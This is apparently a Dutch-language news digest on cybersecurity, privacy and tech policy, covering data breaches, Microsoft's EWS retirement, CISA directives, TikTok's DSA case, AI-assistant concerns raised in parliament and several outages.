De Kamerleden vroegen ook of de Belastingdienst in Nederland btw kan heffen over de data die socialmediaplatforms van gebruikers krijgen en of de Belastingdienst dit van plan is. Heijnen antwoordde dat de Belastingdienst btw kan heffen als daarvoor een voldoende eenduidige juridische grondslag is, maar dat die grondslag er op dit moment niet is.

Heijnen voegde toe dat heffing van btw in situaties die buiten het richtsnoer vallen pas aan de orde komt als er een ‘rechtstreeks verband’ tussen de geleverde data en de dienstverlening kan worden vastgesteld én als vaststaat over welk bedrag btw geheven zou kunnen worden. Hierover is op dit moment geen duidelijkheid. Bron

Telegram-oprichter Pavel Durov heeft via zijn platform alarm geslagen over de plannen van de Spaanse regering om een leeftijdsverbod en leeftijdsverificatie voor social media in te voeren. Durov stelt dat deze maatregelen, die worden ingevoerd onder het mom van het beschermen van kinderen, kunnen leiden tot een surveillancestaat en een gevaar vormen voor de vrijheid van meningsuiting en privacy.

Volgens Durov verplichten de maatregelen platforms tot het uitvoeren van strenge controles, zoals het vragen om een identiteitsbewijs of biometrische gegevens. Hij waarschuwt dat dit een precedent schept waarbij de identiteit van elke internetgebruiker wordt gevolgd, wat anonimiteit ondermijnt en de deur openzet voor grootschalige dataverzameling. Durov vreest dat wat begint bij minderjarigen zich kan uitbreiden naar iedereen en open dialoog verstikt.

De Spaanse autoriteiten willen ook de leidinggevenden van socialmediaplatforms kunnen veroordelen voor de content op hun platforms. Durov stelt dat dit zal leiden tot censuur, waarbij alles wat ook maar een beetje controversieel is door platforms wordt verwijderd om risico's te voorkomen. Hierdoor zouden politiek verzet, journalistiek en dagelijkse meningen het zwijgen worden opgelegd. Durov merkt op dat iemands mening de volgende kan zijn als die de status quo uitdaagt.

Een ander onderdeel van het Spaanse plan betreft het aanpakken van algoritmes. Durov waarschuwt dat overheden hierdoor kunnen bepalen wat mensen op socialmediaplatforms te zien krijgen, om zo kritische meningen te laten verdwijnen en door de staat gecontroleerde echokamers te creëren. Het vrij verkennen van ideeën zal zo verdwijnen en worden vervangen door gerichte propaganda, aldus Durov.

Durov vreest ook dat de autoriteiten vage definities van "hate speech" zullen aangrijpen om kritiek op de overheid de mond te snoeren en zo oppositie te onderdrukken. Hij stelt dat dit geen waarborgen zijn, maar stappen richting totale controle. Durov roept Spanjaarden op om waakzaam te zijn en voor hun rechten op te komen.

Het Spaanse Ministerie van Wetenschap (Ministerio de Ciencia, Innovación y Universidades) heeft een gedeeltelijke shutdown van zijn IT-systemen aangekondigd, wat gevolgen heeft voor diverse diensten voor burgers en bedrijven. Het ministerie is verantwoordelijk voor wetenschapsbeleid, onderzoek, innovatie en hoger onderwijs, en beheert administratieve systemen die worden gebruikt door onderzoekers, universiteiten en studenten. Deze systemen verwerken gevoelige informatie.

De maatregel is genomen naar aanleiding van een "technisch incident", aldus het ministerie, zonder verdere details te verstrekken. Een dreigingsactor claimt echter een aanval op de systemen van de instelling en heeft data gepubliceerd als bewijs van de inbreuk. "Als gevolg van een technisch incident dat momenteel wordt onderzocht, is het elektronische hoofdkantoor van het Ministerie van Wetenschap, Innovatie en Universiteiten gedeeltelijk gesloten", staat in een aankondiging op de website van het ministerie. Alle lopende administratieve procedures zijn opgeschort, waarbij de rechten en belangen van alle betrokkenen worden beschermd. Om de impact van de verstoring te minimaliseren, verlengt het ministerie alle deadlines voor getroffen procedures, in overeenstemming met artikel 32 van wet 39/2015.

Een dreigingsactor onder de alias ‘GordonFreeman’ (een verwijzing naar het Half-Life spel) bood data, die zogenaamd van het Spaanse ministerie gestolen is, aan de hoogste bieder aan. De vermeende hacker heeft op underground forums voorbeelden van de data gelekt, waaronder persoonlijke gegevens, e-mailadressen, inschrijvingsaanvragen en screenshots van documenten en ander officieel papierwerk. De dreigingsactor beweert het Spaanse Ministerie van Wetenschap te hebben gehackt door een kritieke Insecure Direct Object Reference (IDOR) kwetsbaarheid te exploiteren, waardoor ze geldige inloggegevens kregen voor "full-admin-level access".

Het forum waar de informatie verscheen is inmiddels offline en de data is nog niet op andere platforms verschenen. De gelekte afbeeldingen lijken legitiem, hoewel BleepingComputer de authenticiteit van de claims niet kon bevestigen. Spaanse media melden dat een woordvoerder van het ministerie heeft bevestigd dat de IT-systeem verstoring verband houdt met een cyberaanval. 1

Microsoft heeft aangekondigd dat de Exchange Web Services (EWS) API voor Exchange Online in april 2027 wordt stopgezet, na bijna 20 jaar dienst. EWS is een cross-platform API voor het ontwikkelen van applicaties die toegang hebben tot Exchange mailbox items, zoals e-mailberichten, vergaderingen en contactpersonen. Deze items kunnen worden opgehaald uit verschillende bronnen, waaronder Exchange Online en on-premises edities van Exchange (vanaf Exchange Server 2007).

Microsoft begint op 1 oktober 2026 standaard met het blokkeren van Exchange Online EWS. Beheerders kunnen de toegang tijdelijk behouden via een applicatie-allowlist. De definitieve stopzetting vindt plaats op 1 april 2027, zonder uitzonderingen. Beheerders die voor eind augustus 2026 allowlisten maken en instellingen configureren, worden uitgesloten van de automatische blokkering in oktober. Vanaf september 2026 zal Microsoft allowlisten vooraf invullen voor organisaties die er zelf geen hebben gemaakt, gebaseerd op de gebruikspatronen van elke tenant.

Het bedrijf kan ook tijdelijke "scream tests" uitvoeren waarbij EWS tijdelijk wordt uitgeschakeld om verborgen afhankelijkheden bloot te leggen vóór de definitieve stopzetting. IT-beheerders worden op de hoogte gehouden via maandelijkse Message Center-notificaties met tenant-specifieke herinneringen en gebruiksoverzichten.

Deze stopzetting is alleen van toepassing op Microsoft 365- en Exchange Online-omgevingen. EWS blijft functioneren in on-premises Exchange Server-installaties.

"We kondigen vandaag aan dat we een gefaseerd, door beheerders controleerbaar uitschakelplan zullen gebruiken dat begint in oktober 2026 en eindigt met een volledige stopzetting van EWS in 2027," aldus het Exchange Team. "EWS is bijna 20 jaar geleden gebouwd en hoewel het het ecosysteem goed heeft gediend, sluit het niet langer aan bij de huidige eisen op het gebied van veiligheid, schaal en betrouwbaarheid."

Microsoft adviseert ontwikkelaars die de EWS API gebruiken om over te stappen op de Microsoft Graph API, aangezien deze API bijna volledige functionaliteit biedt voor de meeste scenario's. "EWS wordt niet on-prem stopgezet. Hybride scenario's variëren afhankelijk van hoe apps toegang krijgen tot data. On-prem mailboxes kunnen EWS blijven gebruiken; cloud mailboxes moeten overstappen op Graph. Autodiscover helpt apps om automatisch de mailboxlocatie te bepalen," voegde Microsoft eraan toe. "Maar let op: alleen Exchange SE ondersteunt Graph voor calls naar Exchange Online, dus hybride klanten moeten Exchange SE gebruiken om on-premises mailboxes te hosten."

De aankondiging volgt op een eerdere onthulling van Microsoft in september 2023 dat het van plan was om de EWS API in oktober 2026 te gaan stopzetten, en na een waarschuwing in 2018 dat EWS geen functionaliteitsupdates meer zou ontvangen. In oktober 2021 maakte Microsoft bekend dat het de 25 minst gebruikte EWS API's voor Exchange Online had afgeschaft en de ondersteuning ervoor in maart 2022 had verwijderd om veiligheidsredenen. 1

Het Cybersecurity and Infrastructure Security Agency (CISA) heeft Amerikaanse federale agentschappen een jaar de tijd gegeven om een reeks end-of-life softwareproducten te patchen of de systemen die ze gebruiken offline te halen. Het gaat onder meer om diverse besturingssystemen en applicaties die niet langer worden ondersteund door hun leveranciers, waardoor ze een potentieel doelwit vormen voor cyberaanvallen.

De richtlijn, die op 3 februari werd gepubliceerd, vereist dat agentschappen tegen 3 februari 2027 actie ondernemen tegen kwetsbaarheden in producten die door CISA zijn opgenomen in de catalogus met bekende geëxploiteerde kwetsbaarheden (KEV). Deze catalogus bevat een lijst van kwetsbaarheden waarvan bekend is dat ze actief worden misbruikt door cybercriminelen.

De producten die onder de richtlijn vallen, omvatten verschillende versies van Microsoft Windows en Windows Server, evenals oudere versies van Adobe Acrobat en Reader. Het gebruik van end-of-life software brengt aanzienlijke risico's met zich mee, omdat er geen beveiligingsupdates meer worden uitgebracht om nieuw ontdekte kwetsbaarheden te verhelpen. Dit maakt systemen die deze software draaien aantrekkelijk voor aanvallers die op zoek zijn naar eenvoudige toegangspunten tot netwerken.

CISA benadrukt dat het niet langer toestaan van het gebruik van deze producten op het netwerk de meest effectieve maatregel is. Agentschappen moeten de betreffende software en hardware identificeren en een plan opstellen voor de uitfasering ervan. Indien het niet mogelijk is om de systemen te patchen of uit te faseren, dienen er compenserende maatregelen te worden getroffen om de risico's te minimaliseren.

De richtlijn is van toepassing op alle federale civiele uitvoerende machtsorganen, maar CISA moedigt ook andere organisaties aan om de aanbevelingen op te volgen. 1

Het beveiligen van het gebruik van kunstmatige intelligentie (AI) binnen organisaties is cruciaal, en een nieuwe gids biedt inzicht in hoe dit effectief kan worden gedaan. AI-gebruikscontrole omvat het implementeren van beleid en technologieën die bepalen hoe AI-modellen worden gebruikt, wie toegang heeft tot deze modellen en welke soorten gegevens ze kunnen verwerken.

De gids benadrukt dat het essentieel is om een evenwicht te vinden tussen het stimuleren van innovatie met AI en het waarborgen van de veiligheid en ethische overwegingen. Het begint met het vaststellen van een duidelijk AI-beleid dat de verantwoordelijkheden definieert en de grenzen van acceptabel gebruik schetst. Dit beleid moet regelmatig worden herzien en bijgewerkt om de snel evoluerende AI-technologie bij te houden.

Toegangscontrole is een ander belangrijk aspect. Organisaties moeten ervoor zorgen dat alleen geautoriseerde gebruikers toegang hebben tot AI-modellen en dat de toegang is gebaseerd op het principe van 'least privilege', waarbij gebruikers alleen toegang hebben tot de informatie en functionaliteiten die ze nodig hebben om hun taken uit te voeren. Dit kan worden bereikt door middel van rolg gebaseerde toegangscontrole (RBAC) en multi-factor authenticatie (MFA).

Data governance is ook van cruciaal belang. AI-modellen leren van data, dus het is belangrijk om ervoor te zorgen dat de data die ze gebruiken schoon, correct en ethisch verantwoord is. Organisaties moeten mechanismen implementeren om de data te controleren die in AI-modellen wordt ingevoerd en om gevoelige data te anonimiseren of te maskeren.

Monitoring en auditing zijn essentieel om ervoor te zorgen dat AI-modellen worden gebruikt zoals bedoeld en dat eventuele afwijkingen of misbruik snel worden opgespoord. Dit kan worden gedaan door middel van logging, alerting en regelmatige audits van AI-gebruik.

De gids adviseert organisaties om te investeren in training en bewustwording om ervoor te zorgen dat alle medewerkers die met AI werken, zich bewust zijn van de risico's en verantwoordelijkheden die daarmee gepaard gaan. Dit omvat het trainen van medewerkers in ethisch AI-gebruik, data privacy en beveiligingsbest practices.

Technologieën voor AI-gebruikscontrole omvatten onder meer AI-firewalls, die het in- en uitgaande verkeer van AI-modellen controleren, en AI-observability tools, die inzicht bieden in hoe AI-modellen worden gebruikt en presteren. Deze tools kunnen helpen bij het opsporen van afwijkingen, het identificeren van potentiële beveiligingsrisico's en het waarborgen van compliance met regelgeving. Download

De Rijksdienst voor het Wegverkeer in Nederland staat mogelijk op het punt om goedkeuring te verlenen voor het Full Self-Driving systeem van Tesla. Indien de Nederlandse autoriteit groen licht geeft, zal deze toelating naar verwachting automatisch gelden voor de rest van Europa. Dit proces verloopt via het principe van wederzijdse erkenning binnen de Europese Unie, waardoor een nationale goedkeuring grensoverschrijdende werking heeft. Tesla is inmiddels gestart met het werven van meerdere voertuigoperators in Europa om de implementatie van het systeem te ondersteunen.

Tegenover de mogelijke goedkeuring staan kritische geluiden over de wijze waarop Tesla momenteel opereert binnen de Europese regelgeving. Onderzoek van het programma Zembla wijst uit dat er signalen zijn van klokkenluiders over het omzeilen van Europese wetgeving met het huidige Autopilot-systeem. Hoewel deze informatie beschikbaar is gesteld aan de toezichthouders, wordt gemeld dat de Nederlandse voertuigautoriteit gedurende een periode van vijf jaar geen contact heeft opgenomen met de betreffende klokkenluider om de bevindingen over het systeem te verifiëren.

Begin februari 2026 is gebleken dat de Amerikaanse opsporingsdienst FBI in openbaar gemaakte documenten de wachtwoorden van meerdere e mailaccounts die aan Jeffrey Epstein zijn gekoppeld niet correct onleesbaar heeft gemaakt. Door deze redactionele fout kwamen de inloggegevens vrij beschikbaar op internet. De gegevens verschenen onder meer op publieke platforms en zelfs via documenten die via het Amerikaanse ministerie van Justitie toegankelijk waren. Kort daarna werd gemeld dat derden daadwerkelijk op accounts hebben ingelogd en daar wijzigingen hebben aangebracht, waardoor de integriteit van de inhoud niet langer gegarandeerd kan worden. Binnen de cybersecuritywereld ontstond discussie over de gevolgen voor mogelijke bewijsvoering, omdat niet meer vaststaat welke gegevens origineel zijn en welke later zijn toegevoegd of aangepast.

Aanvullend werd duidelijk dat sommige wachtwoorden gebaseerd waren op namen uit de directe omgeving van Epstein en mogelijk al jaren circuleerden in zogenoemde combinatielijsten die bij accountovernames worden gebruikt. Er werd geprobeerd kopieën van de mailboxinhoud veilig te stellen voordat de accounts definitief worden afgesloten. Het incident geldt als voorbeeld van hoe fouten bij het anonimiseren van gerechtelijke documenten direct kunnen leiden tot ongecontroleerde toegang en manipulatie van gegevens.

Kort daarna verscheen online een website die fungeert als een volledige kopie van een YouTube kanaal dat aan Epstein wordt toegeschreven. Het platform, bereikbaar via een apart domein, bevat alle bijbehorende videobestanden en wisselde tijdelijk in bereikbaarheid. Analisten volgen de site vanwege de herpublicatie van archiefmateriaal en de technische herkomst van de hosting, niet vanwege de inhoud zelf. De beschikbaarheid van dergelijke kopieën toont hoe snel digitale content buiten officiële platforms kan worden gereproduceerd en verspreid.

Ook ontstond aandacht voor een openbaar ontwikkelde tool op GitHub waarmee gebruikers hun LinkedIn netwerk konden vergelijken met namen uit de zogenoemde Epstein dossiers. De software analyseert lokale connecties en controleert of deze voorkomen in vrijgegeven documenten. De publicatie leidde online tot brede verspreiding en discussies over reputatieschade en de interpretatie van ruwe gegevens, omdat aanwezigheid in documenten geen directe betrokkenheid bewijst maar wel publieke associaties kan veroorzaken.

Daarnaast ontstond op sociale media speculatie rond een Fortnite account met een gebruikersnaam die overeenkomt met een naam uit de dossiers. Activiteit in een recente spelperiode werd door sommigen geïnterpreteerd als aanwijzing dat Epstein nog zou leven. Analisten wijzen er echter op dat dergelijke conclusies niet onderbouwd zijn en dat accounts, namen of aankopen eenvoudig door anderen kunnen zijn gedaan of later zijn hergebruikt. Het voorval illustreert hoe digitale sporen uit datalekken snel leiden tot publieke interpretaties die verder gaan dan de feitelijke gegevens.

De combinatie van foutief geredigeerde gerechtelijke documenten, herpublicatie van archiefmateriaal, OSINT hulpmiddelen en interpretatie van online accounts laat zien hoe een strafdossier jaren later opnieuw digitale dynamiek kan veroorzaken. Vooral het verlies van controle over originele data blijkt daarbij een centraal probleem: zodra derden toegang krijgen, verandert het dossier van statisch bewijsmateriaal in een voortdurend gemodificeerde dataset waarvan de authenticiteit moeilijk vast te stellen is.

In de Tweede Kamer zijn vragen gesteld over de veiligheids- en privacyrisico's van AI-assistenten en of de overheid wel van dergelijke technologie gebruik zou moeten maken. Aanleiding voor de vragen van CDA-Kamerlid Zwinkels is berichtgeving over de AI-assistent OpenClaw, die taken voor gebruikers kan uitvoeren. Cisco noemde deze AI-assistent eerder al een "security nachtmerrie". Antivirusbedrijf Bitdefender adviseert om OpenClaw niet op zakelijke systemen te draaien.

Het CDA wil opheldering van demissionair staatssecretaris Van Marum voor Digitalisering. Een van de vragen is of de staatssecretaris de zorgen deelt dat steeds autonomer opererende AI-assistenten risico’s vormen voor veiligheid, privacy, menselijke controle en mentale gezondheid, en welke risico’s hij het meest urgent acht. Ook wil het CDA weten of het wenselijk is dat AI-systemen zelfstandig handelingen, zoals het doen van aankopen en het aangaan van contracten, kunnen verrichten namens gebruikers.

Verder vraagt het CDA-Kamerlid of het naar inzicht van de staatssecretaris wenselijk is dat er vanuit de overheid gebruik gemaakt wordt van autonome AI-assistenten, op welke vlakken dit al gebeurt, onder welke voorwaarden dit toegestaan wordt en hoe hierop wordt toegezien in de praktijk. Zwinkels vraagt ook hoe bij het gebruik van autonome AI-assistenten in kritieke infrastructuur en in sectoren als defensie, de zorg en de overheid zelf, altijd sprake blijft van ‘human in the loop’. Van Marum heeft drie weken om met een reactie te komen.1

Het Cybersecurity and Infrastructure Security Agency (CISA) heeft een dringende oproep gedaan aan organisaties om onmiddellijk onbeveiligde edge-apparaten uit hun netwerken te verwijderen. Deze oproep volgt op een reeks recente cyberaanvallen waarbij dergelijke apparaten werden gebruikt als toegangspoort tot kritieke infrastructuren.

Edge-apparaten, zoals IoT-sensoren, bewakingscamera's en industriële besturingssystemen, bevinden zich vaak aan de rand van een netwerk en hebben beperkte beveiligingsfuncties. Dit maakt ze aantrekkelijke doelwitten voor cybercriminelen die op zoek zijn naar een gemakkelijke manier om een netwerk binnen te dringen. Eenmaal binnen kunnen aanvallers zich lateraal verplaatsen en toegang krijgen tot gevoelige gegevens of kritieke systemen.

CISA waarschuwt dat veel organisaties zich niet bewust zijn van de risico's die verbonden zijn aan het gebruik van onbeveiligde edge-apparaten. Vaak worden deze apparaten geïnstalleerd zonder de juiste beveiligingsmaatregelen te implementeren, zoals sterke wachtwoorden, regelmatige beveiligingsupdates en netwerksegmentatie. Dit creëert een aanzienlijk beveiligingsrisico voor de gehele organisatie.

De oproep van CISA benadrukt het belang van een proactieve aanpak van cybersecurity. Organisaties moeten een grondige risicobeoordeling uitvoeren om alle onbeveiligde edge-apparaten in hun netwerk te identificeren. Vervolgens moeten ze onmiddellijk actie ondernemen om deze apparaten te verwijderen of te beveiligen. Dit kan onder meer het implementeren van sterke authenticatiemaatregelen, het updaten van de software, het segmenteren van het netwerk en het monitoren van de apparaten op verdachte activiteit omvatten.

CISA adviseert organisaties om de volgende stappen te ondernemen om hun edge-apparaten te beveiligen:

1. Identificeer alle edge-apparaten in het netwerk.

2. Voer een risicobeoordeling uit om de kwetsbaarheden van elk apparaat te bepalen.

3. Implementeer sterke authenticatiemaatregelen, zoals multi-factor authenticatie.

4. Update de software van de apparaten regelmatig om beveiligingslekken te patchen.

5. Segmenteer het netwerk om de impact van een succesvolle aanval te beperken.

6. Monitor de apparaten op verdachte activiteit.

7. Overweeg om onbeveiligde apparaten te verwijderen als ze niet langer nodig zijn.

Door deze stappen te volgen, kunnen organisaties het risico op een succesvolle cyberaanval via edge-apparaten aanzienlijk verminderen. 1

De Europese Commissie heeft vastgesteld dat het ontwerp van TikTok in strijd is met Europese regelgeving vanwege verslavende eigenschappen. Het gaat hierbij specifiek om functionaliteiten zoals het oneindig kunnen scrollen, het automatisch afspelen van video's, pushmeldingen en het sterk gepersonaliseerde algoritme. Vanwege deze bevindingen is de Commissie voornemens het Chinese socialemediaplatform een boete op te leggen die kan oplopen tot zes procent van de wereldwijde omzet. Gezien de omzet van ongeveer 20 miljard euro in 2024, zou dit neerkomen op een bedrag van ruim 1 miljard euro.

Deze stappen volgen op een diepgaand onderzoek dat twee jaar geleden werd gestart, waarbij interne gegevens en documenten zijn geanalyseerd en wetenschappers zijn geraadpleegd. Volgens de Commissie houdt TikTok onvoldoende rekening met de schade die de inrichting van de app kan toebrengen aan de fysieke en mentale gezondheid van gebruikers, met name minderjarigen. Het mechanisme waarbij gebruikers constant worden beloond met nieuwe content, zou de hersenen op een automatische piloot zetten, wat kan leiden tot dwangmatig gedrag en verminderde zelfbeheersing.

Uit het onderzoek komt verder naar voren dat het platform signalen van dwangmatig gebruik, zoals nachtelijke activiteit door minderjarigen, negeert. De Europese Unie eist aanpassingen in het basisontwerp van de applicatie, waaronder het uitschakelen van de oneindige scrollfunctie op bepaalde momenten en het inlassen van pauzes. Hoewel TikTok maatregelen heeft getroffen zoals een schermtijdtool en technologie om de leeftijdsgrens van 13 jaar te handhaven, acht de Commissie deze stappen ontoereikend.

TikTok heeft laten weten het fundamenteel oneens te zijn met de voorlopige conclusies en noemt het geschetste beeld onjuist en ongefundeerd. Het bedrijf kondigt aan zich te zullen verweren tegen de bevindingen. De handhaving vloeit voort uit de Digital Services Act (DSA), die grote platforms verantwoordelijk houdt voor een veilige online omgeving. Eurocommissaris Henna Virkkunen heeft aangegeven strikt te handhaven; in dit kader wordt ook Meta onderzocht en heeft platform X reeds een boete van 120 miljoen euro ontvangen. 1

In tientallen hotelkamers in China zijn verborgen camera's aangetroffen waarmee heimelijk opnames worden gemaakt van gasten tijdens seksuele handelingen. Deze beelden, aangeduid als spionageporno, worden tegen betaling verspreid en in sommige gevallen zelfs live gestreamd via het platform Telegram. Onderzoek door BBC World Service naar dit fenomeen wijst uit dat aanbieders online diverse hotelkamerbeelden aanbieden. De onderzoekers stuitten op aanbieders die claimden over ongeveer 180 camera's te beschikken, waarvan van 54 exemplaren regelmatig live beeldmateriaal beschikbaar was. Andere aanbieders bleken in het bezit van duizenden oudere opnames die soms jaren teruggaan.

In een specifiek geval in de stad Zhengzhou troffen onderzoekers een camera aan die verborgen was achter een ventilatierooster. Opmerkelijk was dat een speciale detector niet reageerde op dit apparaat. Het maken en verspreiden van pornografisch materiaal is verboden in China, maar de exploitatie van deze beelden blijkt lucratief. De betrokken partijen zouden op jaarbasis tienduizenden euro's verdienen aan de verkoop van de beelden, wat aanzienlijk hoger is dan het gemiddelde inkomen in China. Hoewel beelden via Telegram worden gedeeld, worden niet alle kanalen direct door het platform verwijderd.

De ontdekking van de grootschalige spionage heeft geleid tot online waarschuwingen voor reizigers. Op internet circuleren adviezen over hoe verborgen apparatuur kan worden opgespoord. In sommige gevallen nemen hotelgasten zelfs maatregelen zoals het spannen van tentdoeken over het bed om te voorkomen dat zij heimelijk gefilmd worden. Slachtoffers komen de beelden soms onverwacht zelf tegen op internet, zoals een dertiger die zichzelf en zijn vriendin herkende tijdens het zoeken naar beelden. Er bestaat onder het publiek onduidelijkheid over de verantwoordelijkheid en mogelijke sancties voor hotels, medewerkers of gasten die dergelijke apparatuur installeren voor het bespioneren van volgende bezoekers. 1

Fotodienst Flickr heeft gebruikers gewaarschuwd voor een mogelijk datalek met hun persoonsgegevens. Volgens het platform werd het gisteren gewezen op een kwetsbaarheid in het systeem van een mailserviceprovider waar het gebruik van maakt. Deze kwetsbaarheid heeft mogelijk geleid tot ongeautoriseerde toegang tot gegevens van Flickr-gebruikers.

Flickr stelt dat mogelijk namen, e-mailadressen, gebruikersnamen, accounttypes, ip-adressen, generieke locaties en Flickr-activiteit van gebruikers zijn gelekt. Verder meldt de fotodienst dat het de toegang tot het getroffen systeem heeft uitgeschakeld en alle links naar het kwetsbare endpoint heeft verwijderd. Daarnaast heeft het een volledig onderzoek van de serviceprovider geëist. Ook zouden de relevante privacytoezichthouders zijn ingelicht. Verdere details over het incident zijn niet gegeven. 1

Criminelen zijn erin geslaagd het netwerk binnen te dringen van SmarterTools, de ontwikkelaar achter de mailserversoftware SmarterMail. Het bedrijf heeft bevestigd dat de inbraak, die plaatsvond op 29 januari 2026, het werk was van een ransomwaregroep. De aanval werd mogelijk gemaakt door een ongepatchte virtuele machine die door een medewerker was opgezet. Deze machine was niet bekend bij de organisatie, waardoor noodzakelijke beveiligingsupdates ontbraken en aanvallers een toegangspunt vonden.

De softwareontwikkelaar geeft aan dat er voorafgaand aan het incident ongeveer dertig servers en virtuele machines in het netwerk aanwezig waren waarop SmarterMail draaide. Chief Commercial Officer Derek Curtis verklaart dat het gebrek aan beheer over de onbekende machine van de medewerker direct leidde tot de compromittering van de mailserver en de daaropvolgende inbraak. SmarterMail, dat functioneert als een alternatief voor Microsoft Exchange op Windows en Linux, had de afgelopen maanden al te maken met meerdere kritieke kwetsbaarheden waar actief misbruik van werd gemaakt.

Bij het incident zijn in totaal twaalf Windows-servers gecompromitteerd. Dit heeft ook gevolgen gehad voor een niet nader genoemd aantal klanten, waarbij het volgens CEO Tim Uzzanti voornamelijk gaat om afnemers van de gehoste helpdesksoftware SmarterTrack. Als reactie op de aanval heeft SmarterTools besloten om Windows-systemen waar mogelijk volledig uit te faseren. Daarnaast maakt het bedrijf geen gebruik meer van Active Directory services om de beveiliging van de infrastructuur te herzien. 1

Een datalek bij Flickr heeft geleid tot de blootstelling van gebruikersgegevens. Het lek is ontstaan door een beveiligingslek bij een externe partner van Flickr.

Hoewel de exacte aard van het beveiligingslek en de omvang van de blootgestelde gegevens nog niet volledig zijn vastgesteld, wordt er momenteel onderzoek gedaan naar het incident. Er wordt gewerkt aan het identificeren van de getroffen gebruikers en het implementeren van maatregelen om verdere blootstelling van gegevens te voorkomen.

Gebruikers wordt aangeraden hun wachtwoorden te wijzigen en alert te zijn op verdachte activiteiten op hun accounts. Flickr heeft nog geen details vrijgegeven over het type gegevens dat mogelijk is gecompromitteerd, maar het is raadzaam om persoonlijke en financiële informatie nauwlettend in de gaten te houden.

Het is nog onduidelijk welke impact dit datalek zal hebben op de privacy van de gebruikers en of er juridische stappen zullen worden ondernomen. Meer informatie zal worden verstrekt zodra het onderzoek is afgerond.

Bron: URL: 1

Er is een nieuwe versie van het AI-model Claude uitgebracht, genaamd Claude Opus 4. Deze versie biedt verbeterde mogelijkheden op het gebied van redeneren, wiskunde en coderen. Het model is ontworpen om complexe taken uit te voeren en is beschikbaar voor gebruikers via de Claude API. Claude Opus 4 overtreft eerdere versies in benchmarks voor probleemoplossing en creatieve taken. Het nieuwe AI-model zou een significante verbetering laten zien in het begrijpen van context en het genereren van meer accurate en relevante antwoorden.

Bron: URL: 1

Er is momenteel sprake van een grootschalige storing bij de meldkamers van hulpdiensten in heel Nederland. Het Landelijk Meldkamer Systeem (LMS) functioneert niet, waardoor centralisten niet kunnen inloggen op hun computersystemen. Een woordvoerder van de Veiligheidsregio Rotterdam-Rijnmond heeft bevestigd dat het LMS eruit ligt. Ondanks de technische problemen is het noodnummer 112 nog wel bereikbaar voor urgente hulpvragen.

De storing heeft directe gevolgen voor de werkwijze binnen de meldkamers. Hoewel hulpdiensten nog steeds op pad gestuurd kunnen worden, is de reguliere procedure momenteel niet uitvoerbaar. Dit vereist de nodige afstemming omdat de communicatie anders verloopt dan gebruikelijk. Het grootste probleem bevindt zich in het contact tussen de meldkamer en de eenheden op straat, die nu via alternatieve wegen met elkaar communiceren.

Naast de problemen met het LMS is ook het algemene informatienummer van de politie, 0900-8844, minder goed bereikbaar. Een woordvoerder van de Landelijke Eenheid adviseert burgers om bij geen gehoor het nummer later opnieuw te proberen als er geen sprake is van spoed. Het noodnummer 112 dient uitsluitend voor spoedgevallen gebruikt te worden. In de veiligheidsregio Rotterdam-Rijnmond is naar aanleiding van de storing een crisisteam bijeengekomen.

Bron 1

Een aanzienlijke stroomstoring in een van Microsofts West US datacenters heeft geleid tot wijdverspreide verstoringen van diensten. Duizenden Windows 11-gebruikers konden hierdoor geen toegang krijgen tot de Microsoft Store of Windows Updates voltooien. Het incident, dat begon op zaterdagochtend 7 februari 2026 om ongeveer 08:00 UTC, benadrukt de kwetsbaarheid van gecentraliseerde cloudinfrastructuur.

Gebruikers in meerdere regio's, met name degenen die afhankelijk zijn van Azure-services in de West US-regio, meldden timeouts en fouten bij het downloaden van applicaties of het ophalen van kritieke patches voor het besturingssysteem. Microsoft erkende de oorzaak in een officiële verklaring: een stroomstoring in een datacenter beïnvloedt de mogelijkheid van klanten om bewerkingen in de Microsoft Store en Windows Update te voltooien.

De stroomstoring had een domino-effect op Azure-opslagclusters die de content delivery networks voor de Store en Update-services ondersteunen. Back-up stroomsystemen werden automatisch geactiveerd en de stroom is sindsdien gestabiliseerd in de getroffen gebieden. Het herstellen van de elektriciteit herstelt echter niet direct complexe cloudomgevingen. De "koude start" van opslagservices en de resynchronisatie van gegevens over knooppunten kost tijd.

Naast de impact op het downloaden van applicaties, ondervonden enterprise administrators problemen met de monitoring. De stroomstoring verminderde de kwaliteit van de telemetrie pipelines die IT-professionals gebruiken om hun eigen Azure-resources te monitoren. Klanten konden last hebben van "intermitterende service onbeschikbaarheid of vertragingen in monitoring en log data voor sommige resources die in de getroffen datacenter gebieden worden gehost."

Op zondagochtend 8 februari meldde Microsoft dat het bedrijf actief werkt aan het herstellen van de volledige servicebetrouwbaarheid. Hoewel de meeste services weer online zijn, wordt enige resterende latentie in de West US-regio verwacht, aangezien opslagarrays hun consistentiecontroles voltooien. Microsoft adviseert getroffen klanten om Microsoft Store en Windows Update bewerkingen later opnieuw te proberen. IT-beheerders worden aangemoedigd om het Azure Service Health dashboard te raadplegen voor details over hun specifieke tenants. Gebruikers die fout 0x80070002 of soortgelijke timeout codes in Windows Update tegenkomen, wordt aangeraden geduld te hebben.

Bron: Microsoft

Tsjechië overweegt een verbod op sociale media voor jongeren onder de vijftien jaar. Premier Andrej Babis heeft zich in een video op Facebook uitgesproken voor een dergelijk verbod. Volgens de premier hebben experts hem geïnformeerd over de schadelijke effecten van sociale media op kinderen. De premier benadrukt de noodzaak om kinderen te beschermen tegen deze negatieve invloeden. Het is nog onduidelijk hoe dit verbod in de praktijk zal worden gehandhaafd en welke sociale media platforms onder het verbod zouden vallen. De specifieke details over de implementatie en de juridische basis van het voorgestelde verbod zijn nog niet bekendgemaakt.

Bron: HLN.be

De Rechtspraak gebruikt sinds januari 2020 Zivver voor het veilig versturen van e-mails met vertrouwelijke informatie. Dit was een verbetering ten opzichte van het eerdere gebruik van Outlook, waarbij de beveiliging tekortschoot. Zivver versleutelt berichten en vereist een code via sms om ze te openen.

Advocaat Michael Ruperti heeft echter zijn twijfels over de veiligheid van Zivver. Hij verwijst naar een uitspraak van staatssecretaris Arno Rutte (Justitie en Veiligheid), die niet kon uitsluiten dat gevoelige informatie via Zivver in handen van de Amerikaanse of Israëlische overheid zou kunnen komen. Dit komt doordat Zivver is overgenomen door het Amerikaanse Kiteworks, dat volgens Follow the Money wordt gerund door voormalige Israëlische spionnen.

Ruperti stelt dat de overname gevoelige data van Nederlandse burgers en overheden binnen het bereik brengt van Amerikaanse wetten die de overheid het recht geven data op te eisen, ongeacht de locatie. Het ministerie van Justitie en Veiligheid zou zelf in juli 2025 al gestopt zijn met Zivver. De Raad voor de rechtspraak heeft aangegeven dat Nederlandse rechtbanken herbeoordelen of ze geclassificeerde stukken via Zivver blijven verzenden.

